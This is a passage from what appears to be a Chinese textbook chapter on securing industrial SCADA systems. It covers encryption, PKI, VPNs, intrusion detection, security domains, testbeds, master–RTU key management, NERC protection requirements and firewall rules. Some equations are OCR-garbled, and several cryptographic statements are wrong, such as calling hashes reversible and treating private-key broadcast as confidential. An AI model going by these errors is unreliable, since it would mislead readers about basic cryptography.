混杂节点放置了分析器的人和搭建模拟目的地址的欺骗者都是不设防的。幸运的 是,TCP/IP 和 UCA 允许数据加密。不幸的是,只有极少数的电信设备提供商使用 了该功能。 密码技术能够被归纳为3个重要方面:①密钥算法只能被发送者和接收者知 晓。②私钥采用的对称的公共密码算法。③公用/私有密钥对采用的是非对称的 公共密码算法。密钥加密通常采用可逆的哈希算法或者其他算法。对称性加密采 用私有密钥和公共的加密算法加密信息,因此,任何人只要知道你的私有密钥,就 可以解析出该加密信息的内容。而对称性加密设备通常采用数据加密标准(DES) 进行规范。不对称的公共加密算法,例如著名的RSA算法,它采用了两个密钥, 一 个是公有的一个是私有的,因此,任何经由你的私有密钥加密的信息均能够通过你 的共有密钥解密。同样的,任何经过别人公有密钥加密的信息,也只能通过别人的 私有密钥解密。而私有密钥不能通过公有密钥得到,所以,双方的通信是可靠的、 安全的。 在点到点的安全通信中,你得到接收者的公有密钥,加密你的信息,因为该信 息只能通过接收者的私有密钥解密,所以你能够在公共的链路上面安全地传输它。 另一方面,为了发送安全的广播信息,你需要通过你的私有密钥加密你的信息,然 后向所有持有你公有密钥的接收者广播你的信息。任何凡是知道你公有密钥的接 收者就能够解密你传输的信息,因此,合理地分发你的公有密钥能够保障安全的多 点式通信的实现,从而不会危害你安全的点到点的加密。 (7)公共密钥基础设施(PKI) 。 提供生产及撤销公有密钥的方法,公有密钥 的证书通过认证授权为验证公有密钥所有者的合法性负责。PKI 能够通过不对称 的公共密钥算法提供认证、加密和认可服务等。本文中, 一种冗余的 PKI公有密钥 算法是非常重要的,而且,已经有很多论文和书籍对这个课题进行了描述。适当地 使用密码和密码算法,使在互相信任的对象之间创建私密的会话和校验信息已经 被正确地传输和接收成为了可能。无论如何,综合变电站的解决方案和 SCADA 系统的设计说明了PKI 解决方案对于它们的管理、控制和电能保护策略是相对缓 慢的。当在紧急情况下需要密钥的时候,信息就不应该使用PKI 方案在公共网络 中传输。 (8)虚拟专用网(VPN) 。 结合了IPSec 技术和防火墙,最终形成了点到点安 全,加密连接的公共网络,因此,从其不受干扰性出发,可以将其看成是一个单一的 内部网络。VPN经常被比喻为“隧道”。通过允许数据加密和允许点到点寻址的 标准来压缩数据包,使你能够通过公共网络在两个防火墙之间传输安全的数据包。 通过软件或硬件均能够实现 VPN 功能。VPN 盒子是一个硬件设备,它能够在类似的路由器之间接收和发送安全的、加密的网络数据包。 2)事中响应技术 入侵检测系统(IDS) 技术对于识别内部错误操作和外部攻击者尝试获得内部 访问权限的攻击行为非常有效。它能检测和识别出内部或外部用户破坏网络的意 图。IDS 有两种常见的形式:数字签名检测系统和不规则检测系统。入侵者常常 通过攻击数字签名,从而获得进入系统的权限或破坏网络的完整性。数字签名检 测系统通过将现在的攻击特性与已知攻击特性数据库进行比对,根据选择的灵敏 程度,最终确定比对结果。然后,根据比对结果,确定攻击行为的发生,从而阻断攻 击行为并且通报系统管理员当前系统正在遭受到攻击。不规则检测技术通过对比 正在运行的系统行为和正常系统行为之间的差异,确定入侵行为的发生且向系统 管理员报警。例如,IDS 能够检测在午夜时分系统不正常的活跃性或者外部网络 大量访问某I/O 端口等。当不正常的活动发生时,IDS 能够阻断攻击并且提醒系 统管理员。 以上两种 IDS系统都有其优点和缺点,但是,它们都有一个相同的问题——如 何设置检测灵敏度。高灵敏度会造成错误的入侵报警, IDS 会对每个入侵警报作 相应的系统动作,因此,过多的错误入侵警报,不仅会破坏正常系统的某些必须的 功能,而且还会对系统造成大量额外的负担。而低灵敏度会使 IDS不能检测到某 些入侵行为的发生,因此IDS会对一些入侵行为视而不见,从而使入侵者成功进入 系统,造成不可预期的损失。 3)事后取证技术 审计日志机制是对合法的和非合法的用户的认证信息和其他特征信息进行记 录的文件,是工业 SCADA 系统信息安全主要的事后取证技术之一。因此,针对每 个对系统的访问及其相关操作均需要被记录在案。当诊断和审核网络电子入侵是 否发生时,审计日记是必不可少的判断标准之一。此外,系统行为记录也是工业 SCADA 系统信息安全的常用技术。 上述讨论的是在工业SCADA 系统信息安全中一些常用的、常规性技术,而在 工业 SCADA 系统信息安全实施过程中,主要有以下一些特别的关键技术。 4.2 基于工业 SCADA 系统安全域的信息安全技术 随着现代过程工业、流程工业、制造工业的快速发展,控制业务与作业数据采 集需求成倍增加,工业 SCADA 系统的功能不断增强,其网络复杂程度在不断提 高;各生产单元内部系统与受控系统信息交换的需求也不断增长,主要包含了外部 信息流入和内部信息流出。系统的核心信息, 一方面面临数据受灾、泄漏等影响较 大的威胁;另一方面面临“震网”病毒等扩散导致工业控制系统失效、错误控制导 致工业生产突然中断、公共基础设施瘫痪、环境污染、财产损失、人员伤亡等毁伤性较高的威胁。工业 SCADA 系统的安全防护重点在于信息的可用性、完整性和机 密性。分析目前工业SCADA 系统网络的现状,主要存在以下这些安全问题: (1)网络边界不够清晰,对网络内各部的安全需求缺乏统一规划,没有对核心 业务系统的访问进行很好的控制;各接入系统之间没有进行明确的访问控制,网络 之间彼此可以互相访问,系统局部的安全问题极易扩散到整个系统。 (2)工业 SCADA 系统规模急速膨胀,网络结构快速变化,原有 IP 数据网信息 安全技术远远不能满足工业 SCADA 系统的安全要求。此外,工业 SCADA 系统信 息安全威胁级别越来越高,漏洞类型多种多样,攻击破坏力不断增强。 为此,只有从纵深的角度,全盘考虑工业 SCADA 系统信息安全的部署和拓展 应用,才能应对日趋复杂的网络环境。面对多样复杂的安全威胁需求,原有的局部 网络信息安全技术难于适应于目前的需要,建立纵深防御体系,防止因局部的侵入 导致整个系统的崩溃成为必然选择。纵深防御思想是从多个层面根据系统中各部 分的数据信息重要程度、资产等级的不同对安全需求也不同的特点,按照分治法的 思想将系统中有相同安全需求的部分划分成不同的安全域来保障信息与信息系统 的安全。安全域是一个紧密联系的整体,相互间既有纵向的纵深关系,又有横向的 协作关系,每个范围都有各自的安全目标和安全保障职责。通过积极防御、综合防 范的方针为各个保护范围提供安全保障,有效协调纵向和横向关系,提高网络整体 防御能力。 工业 SCADA 系统纵深防御的概念是将设备、端口、服务甚至用户分别定义成 独立的功能集合。这样做的逻辑非常简单:通过定义独立的功能集合,可以将针对 任何一个功能集合的攻击边界最小化。功能集合本身可以使用多种安全防护产品和 技术进行保护,使功能集合形成一个安全自治域。这种安全自治域很难从外界渗透, 因为其分离开的服务将阻止任何外界扫描尝试,并隔离开本自治域内的网络设备15]。 能源工业部门通常将安全自治域定义为非常宽泛的范围,将工业网络分隔为 2个或3个安全区域:控制系统,业务局域网,和前两者之间的“军事”禁止区域。 在某些情况下,例如核工业部门一般使用国际原子能机构定义的 RG5.71 导则里 定义的五层网络区域系统。在精确定义安全自治域之前需要定义功能集合本身。 从概念上简单讲,这个过程困难且耗时。可以从逻辑上通过对网络、资产、完成的 操作,甚至是负责这些操作的人等方面进行分组开始自治域的建立。这些重叠的 功能集合用来识别各个系统之间存在的、通用的共同特性。这样做的结果就是自 治域,自治域只与系统的特定功能有关,且是排他性的功能集合。 如果在工业 SCADA 系统中定义了安全域,这些自治域就需要受到安全保护。 理想情况下,每一个安全域应该受到尽可能高等级的安全保护。但在实际的生产 条件下,经济成本和其他因素往往使这一目标难以达到。因此,需要识别哪些自治 区域在安全和可靠性方面具有高风险性,所以应该在最需要的地方部署强壮的边 界防御能力。边界防御能力可能由防火墙、网络入侵检测系统和IPS 设备(NIDS和NIPS)、路由访问控制列表(ACL)、应用程序监测和其他类似的网络安全产品组 成,所有这些设备应该配置成将安全域中的成员隔离开。 工业 SCADA 系统中的边界防御能力非常重要,边界的内部应该有安全措施 用来保护边界免受内部攻击和围绕建立的边界防御的攻击(例如,通过U 盘等物 理设备将恶意程序带入控制系统,或使用未知的访问接入点或漏洞从系统外部注 入恶意程序)。内部防御能力主要由主机安全防护系统组成,例如防病毒软件,恶 意程序防护软件,主机入侵检测系统(HIDS), 应用程序白名单系统。作为边界防 护机制,内部防御技术在配置时应该考虑和已经建立起来的安全域的参数保持 一致[16]。 基于工业 SCADA 系统安全域的信息安全技术是整个工业 SCADA 系统信息 安全技术体系中一种较为重要的技术,本书将在第5章详细讨论该技术的具体应 用案例。 4.3 基于测试床的工业 SCADA 系统信息安全技术 在现场运行的工业 SCADA 控制系统上进行脆弱性分析和安全评估存在许多 明显的问题: (1)直接采用攻击手段分析系统脆弱性可能存在高危事故风险; (2)给软件系统安装补丁程序的方式有时要求系统重启甚至停机; (3)在工业系统上验证安全措施也存在事故风险; (4)在现有已投运的工业 SCADA 网络、系统和设备中直接实施安全解决方案 (并进行充分验证)存在风险; (5)无法从控制系统生命周期角度来考察控制系统的信息安全; (6)工业SCADA 系统产品类型众多,导致典型性难以确保; (7)工业 SCADA 系统应用广泛,存在资金、人力等不可控因素。 测试床是大型工程的实验验证环境(platform), 面向不同应用有许多解决方 案,如足球世界杯仿真器是一个多智能体测试床、飞行器测试床(RoverEllimp Test- bed 和 UAV Testbed)、无线通信研究中各种测试床等。 工业 SCADA 系统由于其特殊性,构建一个完整环境往往需要耗费巨大的投 资规模,无法在实际运行系统上开展相关传统的信息安全检测等工作,国外都是依 靠测试床技术来开展相关的测试、评估和研究工作,最典型的就是美国能源部在设 置的“National Security Test Bed——NSTB” 。目前国外工业 SCADA 系统信息安全 工作主要依靠现场评估和基于仿真环境的实验室评估两种方式相结合。利用现场 评估能够发现控制系统中存在的具体安全问题,利用实验室评估能够进行渗透测 试、安全问题的验证、安全演练等工作,是现场评估的深入,能够在不影响生产系统 的情况下做深度分析。在控制系统信息安全的研究和应用上,美国和欧洲走在了前列[17]。近十年来,美国和欧洲已经逐步建立了相应的测试床及实验室,相关的 工作仍在不断发展、不断完善过程中。特别是美国,国土安全部和能源部等核心政 府部门对于该项工作极为重视,开展了大量相关的工作。美国总统关键基础设施 保护委员会和其他一些组织也开展了相应的工作,提出和制定了一些提高控制系 统安全性的措施[18]。 用于信息安全研究的工业 SCADA 系统测试床,可以充分实施各种脆弱性分 析与安全评估方法,克服在线评估的风险和局限性。有条件选择更多的典型控制 系统、总线和网络设备,具有典型性。同时,工业 SCADA 系统测试床可以对安全 解决方案进行验证[19]。 4.4 应用于实时控制系统的密钥管理技术 4.4.1 工 业 SCADA 系统的密钥管理要求 密钥管理问题是信息安全中的核心技术之一,密钥管理的目的是确保加密、认 证、鉴别、数字签名过程中所使用的密钥本身的安全性(真实性和有效性)。密钥 的管理包括密钥的产生、分配、储存、保护和销毁,在安全系统中以安全的方式分配 这些密钥是至关重要的,它影响到系统的安全性、可靠性、有效性和经济性。密钥 管理机制设计得是否合理,直接关系到一个信息安全解决方案/系统的保护能力和 可用性。 工业 SCADA 系统在设计和运转过程中的功能安全和实时性要求,以及传统互 联网络成熟的密钥管理模式在工业 SCADA 系统网络中面临的实际应用问题,使得 目前工业控制系统学术界和工程界尚没有非常成熟或者一致公认的密钥管理技术。 工业 SCADA 系统存在许多与传统 IT 网络信息系统截然不同的特点: (1)性能要求; (2)可靠性要求; (3)支持系统和应用软件; (4)风险管理与控制目标; (5)信息安全技术体系; (6)信息安全目标。 工业 SCADA 系统密钥管理技术具备独特的要求和特征,同时面临很多与传 统 IT 互联网不同的问题。 例如工业 SCADA 系统控制中心需要监控数以千计的远程现场子站系统;智能 电网控制中心需要对数以千计的电表基础设施(AMI) 进行记录;表4.2列出了设计 工业 SCADA 系统的密钥管理系统时,需要考虑的、具体的约束条件、功能要求和技 术性能。该表并不是系统性和成体系性的描述,只是作为一般情况的描述。[20] 表4 . 2 工业 SCADA 系统的密钥管理系统约束和所需的属性[21] 特征 描 述 网络环境和技术制约条件 工业设备的长使 用周期 工业SCADA系统网络元素(工业设备/装置)不经常更新换代, 一般有几十年的 使用年限,与传统IT设备频繁更换的情况不同 资源受限 工业SCADA系统中的设备/装置中的CPU和内存资源有一定的限制 专用技术 专用软/硬件、协议 访问限制 维护访问的难度 物理不安全性 没有特定的外围物理保障措施 时钟同步 时钟同步性差 长距离 工业SCADA系统网络中实体之间的距离很长 实体种类多 工业SCADA系统网络中存在大量不同种类、异构的实体 带宽很窄 一般是窄带通信信道 苛刻的延迟性要求 低延迟性要求/几乎是实时系统 非对称通信 主从协议通信模式 拨号 使用拨号moderm 缺少网络安全防 护技术 工业SCADA系统网络中仅有少量的网络安全技术 功能需求 高可用性 通常完成控制功能 容易更换 容易替换原有设备 柔性 便于分离、接管 可扩展性 管理的可扩展能力 所需技术性能 密钥认证 密钥认证 通信源认证 源设备需要经过认证 目标认证 目标设备需经过认证 功能重放管理 功能重放保护 密钥更新 密钥更新 PFS 完备前向安全性 小规模的报文块 在密钥管理系统中仅有少量的报文交换 4.4.2 工 业 SCADA 系 统 的 密 钥 管 理 技 术 需 要 解 决 的 问 题 在通信领域,研究人员已经开发出各种不同的加密和解密信息的方法。这些 加密算法主要分为两种不同的类型:对称和非对称加密算法。对称加密算法的特 点是,该解密密钥和加密密钥是相同的。对称加密,作为传统的加密或单密钥加 密,在20世纪70年代开发公共密钥加密之前,是唯一使用的加密类型。本书仅讨 论在工业 SCADA 系统的信息安全解决方案中使用对称加密算法时,设计密钥管 理方式需要解决的问题。 对于使用对称加密算法的工作模式,涉及通信的双方必须共享相同的密钥,由 访问的其他人保护密钥。目前密码学术界已经有很多密钥分发方法,此处仅以两种 最具有代表性的方法为基础进行讨论。 第一种方法是,通信发起方产生密 钥,并把它发送给响应方。 一般称这种 方法为分散式密钥分发。 如图4. 1所示,这种方法没有密钥 分发中心。在①过程中,通信发起方A 请求B 发送会话密钥,B 响 应A, 用②过 程中已经共享的主加密密钥。最后,确 认 A 在③过程中确认分发的密钥。 第二种方法是,第三方生成密钥并 发布给产生器,或它们两者,这被称为密 钥集中分配,如图4.2所示。 图中用实线流量符号和阿拉伯数字 表示唯一的通信密钥分发产生器A, 而 用一个虚线和字母表示参与通信的双方的密钥分发。图4. 1所示的分散式密钥分配 方法中的①,②和③对应到图4.2是相同的过程。④和⑤是双方共享的会话密钥 的认证过程。 在这种情形中,需要密钥分发中心(KDC) 用于密钥管理。考虑到互联网中最 好使用密钥分发中心来管理密钥分配过程,因为网络中有很多主机和大量的通信 组合方式。假设有N 个主机,那么在Internet 中的网络通信的配对有[N(N-1)]/ 2 种情况,其中每个主机可以与网络中的任何其他主机通信。 然而,在工业 SCADA 系统中却是不同的情况。在工业 SCADA 系统网络中,每 个RTU 与其所在网络中的工业 SCADA 系统主站通信。在这种情况下,主站成为工 业 SCADA系统网络中的唯一主机。所使用的密钥数量大大减少,如图4.3所示[2]。 将工业 SCADA 系统网络中 RTU 或 IED 的数量定义为N, 那么通信组合的数量就 变 成 了N 。 考 虑 如 图 4 . 4 所 示 的 工 业 SCADA 系统网络拓扑,安全设备如图4 . 5所示。 图4 . 3 密钥数量是网络终端节点的函数 图4 . 4 工 业 SCADA 系统网络配置 图4 . 5 安全设备的位置 在这种网络中并不需要使用密钥分发中心处理这个网络拓扑中的密钥分发问 题,整个与RTU的通信过程应该在主站方完成。将密钥分发模型限制在图4.1所 示的分散式分发模型中[23]。工业 SCADA 系统主站是 SCADA 系统通信中的发起 者,所以RTU一侧的安全设备不得不产生会话密钥,这个过程对应图4.1分散式 密钥分发中的过程①。下一步用主密钥加密密钥,并将它发送到主站一侧的安全 设备上,对应于②。最后主站一侧确认它收到的密钥,并与RTU侧共享会话密钥, 对应于③。在共享密钥之后,两方开始他们的通信。图4.6表明在主站和 RTU 之 间创建和共享密钥的这个过程。 此处存在两个问题;第一个问题是,工业 SCADA 系统是否与所有 RTU 使用 共享的通用密钥;第二个问题是,出于安全考虑,工业 SCADA 系统主站应该如何 确定密钥的更新周期。如果一个密钥使用很长时间,这会增加泄露的可能性。然 而我们不能经常改变密钥,因为频繁地改变密钥会增加网络流量和通信故障。这 在工业 SCADA 系统网络中更加关键,因为数据大小和通信频率是其唯一的特性。 结论就是安全强度正比于为 RTU 生成多少数量的密钥和多久改变密钥。然而,使用 上述方法增强的安全性,增加了工业 SCADA 系统网络流量负载,这使得在其他方面产生更脆弱的安全,系统将会难于应对沉重的流量负载。因此设计者应该找出优化 后的密钥数量和密钥分发周期,或者仅仅是两者中的一个。例如,如果我们固定密钥 作为通用密钥用于整个系统,那么设计者只需考虑改变密钥的频率,并且反之亦然。 密钥数量和分发频率之间的线性函数关系并不确定,但当信息安全设计者试 图通过加密和相关的密码策略保护工业SCADA 系统信息安全时,似乎有最高安 全级别的问题。在某些时候,安全情况会随着密钥数量和网络流量的增加而急剧 恶化,这种概念关系如图4.7所示,方程式如下: maxmS(nhey,tam) :受限制于nky≤ngru,tdin≤trq 式中:n 和 tam表示同一时刻的密钥数量和相应的更改密钥的时间周期;nru 是 SCADA 网络中RTU的数量;t 是用于SCADA主站从 RTU 轮询数据的通信周期。 安全KEY的数量和KEY 更换频率 图4.7 密钥策略用于安全最大化 4.4.3 工业 SCADA 系统的密钥管理技术研究进展 工业 SCADA 系统密钥管理技术存在的上述问题,已经成为在工业 SCADA 系 统中部署具有高安全防护能力的信息安全技术机制的关键性技术瓶颈。近几年来,世界各国的工业界、研究机构和知名高校在工业 SCADA 系统的密钥管理技术 方面的研究工作较为活跃,研究人员设计并提出了很多密钥管理模型/方法,其中 较为有代表性的成果如下。[24] 2002年,桑迪亚国家实验室的 Beaver 等人提出了 SCADA 系统的密钥初始化 方法(SKE) 。 该方法将密钥会话通信过程分成两种类型:C-S (控制系统与现场 过程设备方向)模式;用于主站终端单元(MTU) 与远程终端单元(RTU) 之间或子 站级终端单元(Sub-MTU) 与远程终端单元之间的通信,以及子站级终端单元 (Sub-MTU) 的点对点(Peer-to-Peer) 通信。[25 2006年,D.Robert 等人提出了使用密钥分发中心(KDC) 的 SCADA 密钥管理 体系结构(SKMA), 当一个新的远程终端单元注册到 SCADA 系统时,SCADA 密钥 管理体系结构提供远程终端单元之间的安全密钥交互会话通信以及SCADA 约束 条件和安全需求分析能力。[26; 近期,D.H.Choiet al 等人提出用于多播通信的高级 SCADA 密钥管理架构 (ASKMA)及其升级版本(ASKMA+) 。 但是,在这些方法中,位于中心位置的主站 终端单元与子站级终端单元(Sub-MTU) 之间的关系是二叉树类型关系,其余的 主站终端单元和远程终端单元或子站级终端单元和远程终端单元之间的关系是n 元树类型关系。 4.5 工业 SCADA 系统管理组织层面的防护技术 为了满足安全的需求,需要及时采用科技的手段来代替组织行为。 一方面,系 统需要人工的管理和操作;另一方面,为了持续维护安全级别,企业需要了解资产 情况和正在发生的事件信息。 为了满足安全的需求,已经有专家提出了许多安全标准和指导方针。在这份 报告里,我们以北美电力可靠性公司(NERC) 的为例。这些指导方针已经可以支 持北美电力系统的计划和相关操作。在美国电力工业中,这些工业因素都相应地 根据以上方针进行了实践。因此,这些指导方针不但具有广泛的重要性,而且其解 决方案可作为实体的持续性回馈方式。 在这一部分,主要总结了几种对于关键基础设施保护的NERC 需求。NERC 为北美大型电力系统制定的特定标准;但是,对于设计和操作其他工业系统而言 这些也是一些有效的指导和建议。 NERC 对于关键设施保护的可靠标准有以下几种。 1)蓄意破坏报告 这种标准需求有赖于特殊事件(假设或者推断会导致蓄意破坏),必须对合适 的系统、政府部门和监控部门进行报告。 (1)责任的实体必须具备对互联网络中,蓄意破坏大部分设备的恶意事件进行检测的流程。 (2)具备对蓄意破坏事件的信息搜集和通信流程。 (3)具备对个人操作必须经过专门培训,具备对蓄意破坏事件的应急响应指导。 (4)具备对紧急情况报告的流程,并且有专门报警的预案。 2)关键网络资产的认证和保护 这一部分提供了对于关键基础设施网络安全框架的认证和保护。对于每一个 实体,分别定义了不同的职责,并分别定义了实体对于资产的危险程度和脆弱性。 实际上,建议基于对关键资产的应用风险的评估。 (1)关键资产身份认证方法。建立在方法论上的任务分配方法,可以用做鉴 定关键资产。这种方法是文档化的,描述了基于任务分配的方法,包括过程和风险 评估。 (2)关键资产认证。按照规则的时间对关键资产进行认证和更新(一般情况 下,按年计算),并且应用基于任务的风险评估方法。 (3)关键网络资产认证。包含上文提到的资产,以及网络资产的认证。 (4)年度审批。基于任务的评估方法,对于关键资产和关键网络资产必须向 管理者和委员会进行报告。 3)安全管理控制 标准需要个人实体对于关键网络资产负责,并且将安全管理控制和保护措施 最小化。 (1)网络安全策略。合理的安全策略象征着对管理者承诺和确保关键网络资 产安全的能力。 (2)领导策略。 一个主要的领导需要总体上对网络资产进行认证和保护,并 且总体上对管理措施标准负责。 (3)额外情况。网络安全策略中的额外情况必须进行文档化的预案考虑,并 且该文档需要经过管理者或者委员会的授权。 (4)信息保护。开展对于认证、归类和保护关键网络资产信息相关的项目。 (5)访问控制。对于网络关键资产文档和措施的信息保护,进行访问控制。 (6)改变控制和配置管理。对于改变控制和配置管理策略的进程,通过增加、 修改、替换、移动关键软件和硬件的行为必须进行记录和备案。 4)个体培训 这个标准需要对以下方面进行分级:个人任务分配、训练和对于具备访问关键 网络资源权限的个人进行安全监控。 (1)意识。 一个合理的安全监视项目需要确保在正常情况下,具备对个人访 问关键网络资源的认证和授权。项目利用直接(类似 E-mail) 和间接(类似内联 网、手册)通信。 (2)培训。常规的网络安全培训项目主要是在关键网络资源访问授权方面展开。在可行的条件下,需要对网络安全培训项目定期检查、更新。 (3)个人任务分配。必须依据标准的框架和相应的参考文件,精确分配个人 对关键网络资源的访问权限,任务分配必须先于个人对关键网络资源的访问。 (4)使用权。定时维护个人对关键网络资源的访问。 访问列表必须按时更新,并且考虑关键网络资源改变的情况。 对于关键网络资源的访问控制,当个人行为中止时必须在24小时内撤回权 限;当个人不需要访问资源时必须在少于7天内撤回。 5)电子安全边界 这个标准需要对内部关键网络资源的电子安全边界和所有的访问接入点,进 行认证和保护。 (1)电子安全边界。对于电子安全边界中的关键网络资源,这些边界包含的 相关访问点需要认证和记录。 (2)电子访问控制。对于所有电子接入点的控制访问,需要经过评估和设计。 (3)监控电子访问。对于电子或者手动的监控和登录过程,需要经过认证和 持续化的处理。 (4)网络脆弱性评估。需要定期对电子接入点的网络脆弱性进行评估(至少 一年一次)。评估内容包括: ① 关于认证的脆弱性评估过程文档; ② 对所有只有在操作过程中才能用到的端口和服务进行确认的过程; ③ 对电力系统安全参数访问的检查过程; ④ 搜索默认账户、密码和网络管理的控制; ⑤ 对于所有评估结果进行记录,包括解决和缓解认证脆弱性,并且执行计划 任务。 (5)文档检查和维护。所有文档都需要经过检查、更新和维护其他需求。 6)关键网络资源的物理安全 建立确保物理安全项目措施的标准,用来保护关键网络资源。 (1)物理安全计划。物理安全计划需要经过发展,并且经过高级管理员或者 代表团批准。 (2)物理访问控制和监控。物理安全计划方案包括操作化和过程化的控制和 管理,以及对物理安全边界访问的监控,定时一天24小时进行,7 天一周,作为一 个周期。未经认证的访问会被记录和处理。需要采用一个或者多个监控措施: ① 告警系统; ② 认证监控访问点; ③ 登录物理访问。登录时需要记录足够多的信息,按7天一周, 一天24小时 的周期,用来认证个人行为。需要进行的相关操作包含以下几个方面: ① 计算机登录访问 ② 音频记录; ③ 手工登录; ④ 登录日志维护。物理登录日志需要至少保存90天以上。 (3)维护和测试。必须经过维护和测试,以规范文档的形式确保物理安全系 统函数的正确运行。 7)系统安全管理 标准规范定义了方法、处理过程和对于关键和非关键资源的电子安全保护 策略。 (1)测试流程。需要检测网络资源安装和改动事件的发生,并且保证电子安 全的边界并不与其他网络安全控制相冲突。任何一个重要的改变都需要确保补丁 和相关安全策略的实施。 ① 安全测试需要对系统产生最小的影响; ② 测试需要影响产品环境; ③ 测试结果需要被记录。 (2)端口和服务。只有端口和服务允许进行普通和紧急的操作。其他端口和 服务应当被禁止,包含测试用例。需要记录那些未被使用的端口和服务。 (3)安全补丁管理。安全补丁管理程序用来追踪、评估、测试和安装网络安全 软件。需要用安全补丁对电子安全边界的网络关键资源进行建立、记录和维护。 ① 安全补丁需要在一个周期内升级、记录; ② 安全补丁需要被正确执行。如果补丁不能安装,相同的措施需要被执行和 实施,并且记录。 (4)恶意软件保护。反病毒软件和其他恶意软件保护。 (5)账户管理。所有活动账户都需要认证和记录。需要采用技术手段,将未 经验证的系统访问的权利最小化。 ① 根据工作需要,将共享系统账户和接入访问权限设为最小; ② 用户账户需要与访问控制需求相关联; ③ 根据控制级别生成系统日志; ④ 用户账户需要根据访问优先级进行审计。 (6)安全状态监控。 ① 需要利用自动化的组织处理控制工具对系统时间和网络安全进行监控; ② 在登录所有与安全相关网络资源时,需要采用恰当的措施对网络资源进行 认证; ③ 根据事件和报警,对系统进行控制和监控; ④ 对于安全事件,需要利用日志记录事件响应; ⑤ 安全日志需要定期整理。 (7)支配和调换。支配和调换网络资源存在以下定义: ① 在支配和调换数据存储设备前,需要先对该设备进行擦除,保护未验证的 敏感信息泄露; ② 网络资源中,所有支配和调换的存储设备,需要进行严格记录。 (8)文档回顾和维护。所有的文档都需要进行回顾和更新(至少一年一次), 任何改变都需要记录。 8)事件报告和响应计划 这份标准用来确保认证、归类、响应和报告网络安全事件。 (1)网络安全事件响应计划 一个合适的响应计划包括开展、维护和实施。主要包含以下几点: ① 特征和分类事件; ② 响应行为; ③ 事件报告处理; ④ 事件更新、回顾、测试响应计划。 (2)网络安全事件记录。网络安全事件需要进行记录,特别是需要对特定团 体报告。 9)关键网络资源恢复计划 这份标准确保恢复关键网络资源时,需要考虑商业连贯性和灾难恢复的特点。 (1)恢复计划。对于关键网络资源的恢复计划,需要对关键事件的行为和回 应进行响应。 (2)措施。需要有计划的采取相关措施。 (3)控制改变。恢复计划需要进行更新,并且考虑到实际事件。 (4)备份和存储。恢复计划需要对关键网络资源进行备份和存储。 (5)测试备份介质资源。需要对不同种类的介质资源进行提前测试。 4.6 工业 SCADA 系统网络架构优化机制 这部分主要介绍一些为实现安全的控制系统,通常采用的架构优化方面的 技术。 过程控制器和 SCADA 系统一般是建立在隔离网络中,并且,大多数的控制网 络都是建立在一系列串行连接之上。在这些配置条件下,可以天然地避免一些外 来威胁。最近,建立在 TCP/IP 协议上的IT 标准技术科技和以太网,都在广泛使用 控制网络。但是,公共网络中并没有隔离网络域,所以仍然存在这些外在威胁。 以下的几个方面都对设计控制网络产生了许多影响。首先,设计SCADA 系 统的目的是出于控制和安全的考虑。现在,设计阶段不得不考虑传统的IT 安全策 略。但是迄今为止,标准的控制网络的设计仍然缺乏安全措施。所以设计SCADA 网络结构时,必须克服信息安全短板的问题。要重视网络退耦装置、防火墙、反病毒软件,以及相似的技术和机制起到的核心作用。 SCADA 系统的的操作环境与传统 IT 信息系统是不同的。标准的指导手册和 技术需要与环境匹配,对于SCADA系统来说,必须有专门的指导手册用来提高系 统的安全性。 设计安全的 SCADA 结构需要对系统可能会面临的威胁和因素进行提前的风 险评估。这就需要再设计阶段选择合适的策略。 一个安全的构架需要由技术解决方案、处理器、安全过程和策略构成。对于任 何可行的使用范围,需要选择优良的 SCADA 构架。这就需要首先考虑风险评估、 安全策略的选择、构架设计和发展。其实,许多工业标准和指导手册都介绍了处理 这个环节的过程。这些标准的指导手册为了大体上改进安全级别和需求,特别是 对于重要的关键设施,介绍了许多优秀的实践的策略。7] 为了适应安全的控制网络,必须首先考虑 SCADA 系统的特殊性。即使大多 数网络都建立在标准的IT 解决方案基础之上,SCADA 系统必须与传统的IT 环境 中的特征进行区分。大体上存在以下不同的特点。 1)防火墙和网络隔离 作为对网络流量的配置管理设备,防火墙具有以下几种类型: (1)包过滤。大多数种类防火墙具有的能力。包过滤防火墙控制数据包路 由,并且对OSI模型中第三层进行操作。针对特定的规则对数据包进行控制管理, 允许通过或者丢弃数据包、或者向发送方发送特定消息。包过滤防火墙成本低,并 且需要较低的计算性能,对网络影响较小。另一方面,并不需要信息流量的历史信 息或者其他的特别的技术来分析数据包,所以功能有限。28] (2)状态注入。评估 OSI 模型中传输层(TCP、UDP)中数据包的内容。搜集流 量的状态信息,保持对数据包的追踪。并且,为了决定是否将数据包丢弃或者转 发,可以对数据包进行分析。当然,具有这种能力的防火墙成本较高,而且配置 复杂。 (3)应用代理网关。根据 OSI 模型,分析应用层数据包,并且利用规则对网络 应用和协议进行控制管理,提供更高的安全性能,但是成本更高。 防火墙主要用来在企业网络中分离控制网络。分离网络主要可以限制接入控 制系统,并且通过限制没用的流量,来改进网络性能。如前面章节所示,许多网络 拓扑都可以达到这个目的。 配置防火墙需要有组织构架的特定解决方案。由于组织结构具有属性、威胁 和服务多方面的不同,并不存在普遍适用的解决方案。下面,本书概括了一些配置 防火墙的方法,用来保护 SCADA 系统。 在构架中,为了共享服务的目的,并没有考虑使用堡垒主机区域(DMZ) 。 下 面是一些设计规则: ① 所有的规则必须是状态可控,并且均标记IP 地址和端口。 ② 必须对企业网络到控制网络的流量进行管理。实现能够对从组织地址发 往控制设备的单个数据包,进行流量限制。 ③ 对用户选择的IP 地址组的接入,必须可控。 ④ 规则必须与安全的协议匹配。如 HTTPS 协议,仅允许HTTP 和 FTP 协议还 是不够的。 ⑤ 规则应当禁止外部主机对控制网络的主机连接的初始化。 如果使用 DMZ,对于配置企业网络和控制网络,避免它们之间直接连接也是 可行的。隔离双方的流量都需要先在DMZ中连接到服务器,并且具备灵活的穿越 防火墙的协议。 有时,边界流量规则也需要支持内部流量。因为存在一些利用http 信道的恶 意攻击,比如特洛伊木马。相关规则如下: ① 禁止从内部流量到控制系统的连接。限制穿越 DMZ 区,对控制网络的 访问。 ② 最小化外部流量对控制网络防火墙的访问。只允许通过必要的服务和 通信。 ③ 利用特殊的规则限制所有从控制网络发往企业网络的外部流量。从源地 址、目的地址、服务和端口方面进行限制。 总之,对于防火墙配置的普通需求如下: ① 基本规则应该对于所有连接实施“拒绝所有,允许一个”的白名单策略。 ② 在控制网络环境下的端口和服务,以及应该建立在事件基础上对企业网络 进行允许控制。安排专人对威胁进行分析,并且负责对每一个接收和发出的信息 流进行文档记录。 ③ 所有“允许”的规则应该包含IP 地址和TCP/UDP 端口信息,并在恰当的情 况下标明状态。 ④ 